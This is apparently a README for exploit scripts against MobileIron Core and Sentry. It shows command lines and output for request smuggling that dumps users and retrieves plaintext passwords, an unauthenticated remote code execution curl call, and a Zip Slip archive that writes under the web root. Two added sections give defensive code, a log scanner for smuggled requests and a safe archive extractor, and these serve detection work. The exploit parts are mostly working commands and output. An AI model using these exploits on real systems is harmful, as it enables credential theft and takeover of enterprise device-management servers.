# Exploit scripts for MobileIron

More details in:

## HTTP Request Smuggling in Core

- Multiple interesting methods on the Hessian service can be called:

```text
Usage: mi_desync.py [OPTIONS] COMMAND [ARGS]...

Options:
  --help          Show this message and exit.

General options:
  * -t  TEXT  The target URL [default: None] [required]
    -x  TEXT  HTTP proxy [default: (None)]
    -A  TEXT  User-Agent [default: Mozilla/5.0]

Commands:
  findLdapUsers
  getAllUsers              Dump Users
  getLDAPConfigs           Dump the LDAP configuration
  getSettings              Get multiple settings by ID (e.g 28,409)
  getSettingsByProperty    e.g saveUserPassword,enterpriseName
  retrieveUserPassword     Retrieve plaintext password of a user
  setSaveUserPassword      Multiple settings by property (e.g saveUserPassword,feature.flag.secret )
  storeUserPassword        Change password of a user
```
- Dump all users:

```console
$ mi_desync.py -t https://micore.local getAllUsers | jq '.[] | {principal, email, passcode}'
[*] Calling : https://micore.local/ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/UserService...
[+] Got Hessian reply with object of type UserServiceResultDTO
{
  "id": 9000,
  "principal": "misystem",
  "email": null,
  "passcode": null,
  "userSource": "L"
}
{
  "id": 9001,
  "principal": "admin",
  "email": null,
  "passcode": "V2;KyC4Z/jQI4zL0InyCtWZ2g==;F24/vblg/tAaIpwtbY5+PQ==",
  "userSource": "L"
}
[...]
```
- Enable the `saveUserPassword` setting:

```console
$ mi_desync.py -t https://micore.local setSaveUserPassword 1
[*] Calling : https://micore.local/ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/SettingsService%20HTTP/1.1%0aX-Forwarded-For:127.0.0.1%0aA:B
[+] Got Hessian reply with object of type MISettingsResultDTO
[]

$ mi_desync.py -t https://micore.local getSettingsByProperty saveUserPassword
[*] Calling : https://micore.local/ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/SettingsService%20HTTP/1.1%0aX-Forwarded-For:127.0.0.1%0aA:B
[+] Got Hessian reply with object of type tuple
[
    [
        {
            "miSettingId": 28,
            "property": "saveUserPassword",
            "value": "1",
            "uuid": null,
            "id": null,
            "principal": null,
            "deviceSpaceId": 1,
            "deviceSpacePath": "/1/",
            "modifiedAt": "11/01/2023, 01:01:01"
        }
    ]
]
```
- Retrieve a user's password:

```console
$ mi_desync.py -t https://micore.local retrieveUserPassword ayrton
[*] Calling : https://micore.local/ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/UserService%20HTTP/1.1%0aX-Forwarded-For:127.0.0.1%0aA:B
[+] Got Hessian reply with object of type str
["SuperSecureADPassword123"]
```
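The `[*] Calling` lines above show what the front end actually receives: a single request target that carries percent-encoded line breaks (`%0a`), a spoofed `X-Forwarded-For: 127.0.0.1` header and a second request line (`POST /mifs/services/UserService HTTP/1.1`). That shape survives in a reverse-proxy or front-end access log, so it can be hunted for. The following is an added detection example, not code from this repository or from MobileIron: it parses Common Log Format lines (the log lines, timestamps and client addresses are constructed for the example, with the first target mirroring the encoded request printed above) and flags any request target whose decoded form contains CR/LF, an HTTP version token, an embedded request line, or a loopback `X-Forwarded-For` header.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for this example (not taken from a real system).
# The first request target mirrors the encoded shape printed by the tool above.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Jan/2023:01:01:01 +0000] "GET /ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/UserService%20HTTP/1.1%0aX-Forwarded-For:127.0.0.1%0aA:B HTTP/1.1" 200 512
10.0.0.7 - - [11/Jan/2023:01:02:10 +0000] "GET /mifs/login.jsp HTTP/1.1" 200 2048
10.0.0.9 - - [11/Jan/2023:01:03:44 +0000] "POST /mifs/services/UserService HTTP/1.1" 403 0
"""

# Common Log Format: the request line is the quoted "<method> <target> <version>" field.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<version>HTTP/\d\.\d)"')

# A second request line smuggled inside the target, e.g. "\nPOST /mifs/services/UserService HTTP/1.1".
EMBEDDED_REQUEST = re.compile(r"\s(?:GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH)\s/\S*\sHTTP/1\.[01]")
# A header claiming the request originated from the loopback address.
SPOOFED_XFF = re.compile(r"^X-Forwarded-For:\s*127\.0\.0\.1\b", re.IGNORECASE | re.MULTILINE)


def smuggling_indicators(target: str) -> list[str]:
    """Return the reasons a request target looks like CRLF / request-line injection (empty if clean)."""
    decoded = unquote(target)  # handles both percent-encoded and already-decoded targets
    reasons = []
    if "\r" in decoded or "\n" in decoded:
        reasons.append("encoded CR/LF in request target")
    if " " in decoded and re.search(r"\sHTTP/1\.[01]", decoded):
        reasons.append("HTTP version token inside request target")
    if EMBEDDED_REQUEST.search(decoded):
        reasons.append("second request line embedded in target")
    if SPOOFED_XFF.search(decoded):
        reasons.append("X-Forwarded-For spoofed to 127.0.0.1")
    return reasons


def scan_access_log(text: str) -> list[dict]:
    """Parse CLF-style lines and return one hit per suspicious request."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        reasons = smuggling_indicators(match.group("target"))
        if reasons:
            hits.append({
                "client": line.split(" ", 1)[0],
                "method": match.group("method"),
                "target": match.group("target"),
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["client"], hit["method"], hit["target"][:40] + "...", "|", "; ".join(hit["reasons"]))
```

A legitimate request target never contains whitespace or a line break, so the first two checks alone give a low-noise rule; the remaining two name the specific pattern from the output above. Where the logging tier decodes the target before writing it, the raw newline form is matched the same way because `unquote` leaves already-decoded characters untouched.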

## Unauthenticated Remote Code Execution in Sentry

- Call the `uploadFileUsingFileInput` method in `MICSLogService` to execute commands:

```console
$ curl -sk -H 'Content-Type: application/x-hessian' 'https://sentry1.local:8443/mics/services/MICSLogService' -v --data-binary @<(echo $(./mi_sentry_micslogservice.py "<CMD_LINE>") | base64 -d) 2>&1 " --output -

HRH isRunningTZ
```

## Remote Arbitrary File Write via archive extraction (Zip Slip) in Core

- Use `genZip.java` to craft Zip Slip archives:

```console
$ mkdir zipit
$ echo 1 > zipit/test.txt
$ javac genZip.java && java genZip
$ base64 -d genZip.out > payload.zip
$ unzip -l payload.zip
Archive:  payload.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        1  2023-08-01 10:16   ../../../../mi/tomcat/webapps/mifs/text.txt
```
- Exploit the GPO import feature:

```console
$ curl -k https://micore.local/mifs/rest/api/v2/component/gpo/import -u 'admin:***' -H 'Referer: http://micore.local/' -F admxZipPackage=@zipslip/mi_zip/payload.zip
{"errors":null,"result":"Admx package successfully ingested","success":true}
```
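The `unzip -l` listing above shows the only thing an import routine has to inspect: a member name with `../` components, which a naive `join(destination, name)` turns into a write under the web root. As an added defensive example (not code from this repository or from MobileIron), the following Python resolves every member name against the destination directory before anything is written and refuses the whole archive if any member escapes. The sample archive is built in memory for the example and reuses the member name from the listing; the destination path is a made-up placeholder.

```python
import io
import os
import zipfile


def unsafe_entries(zip_bytes: bytes, dest: str) -> list[str]:
    """Return the member names that would land outside dest if extracted by naive path joining."""
    root = os.path.realpath(dest)
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            # Absolute paths and backslash separators never belong in a portable member name.
            if os.path.isabs(name) or name.startswith(("/", "\\")) or "\\" in name:
                bad.append(name)
                continue
            resolved = os.path.realpath(os.path.join(root, name))
            # The resolved path must be dest itself or a descendant of dest.
            if resolved != root and not resolved.startswith(root + os.sep):
                bad.append(name)
    return bad


def safe_extract(zip_bytes: bytes, dest: str) -> list[str]:
    """Extract only if every member stays under dest; reject the whole archive otherwise."""
    bad = unsafe_entries(zip_bytes, dest)
    if bad:
        raise ValueError(f"refusing archive, traversal members: {bad}")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
        return zf.namelist()


def build_sample_archive(with_traversal: bool = True) -> bytes:
    """Constructed sample archive: a benign member plus, optionally, the traversal name from the listing above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("test.txt", "1\n")
        if with_traversal:
            zf.writestr("../../../../mi/tomcat/webapps/mifs/text.txt", "1\n")
    return buf.getvalue()


if __name__ == "__main__":
    # "/tmp/admx-import" is a placeholder destination for the example.
    data = build_sample_archive()
    print("unsafe members:", unsafe_entries(data, "/tmp/admx-import"))
    try:
        safe_extract(data, "/tmp/admx-import")
    except ValueError as exc:
        print(exc)
```

Rejecting the archive outright rather than silently dropping the offending member keeps the event visible in logs. Python's own `ZipFile.extractall` strips `..` components, so the check matters most in extraction code that builds output paths from member names itself, which is the bug class Zip Slip names.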

## Exchange Tabshell with Kerberos authentication

here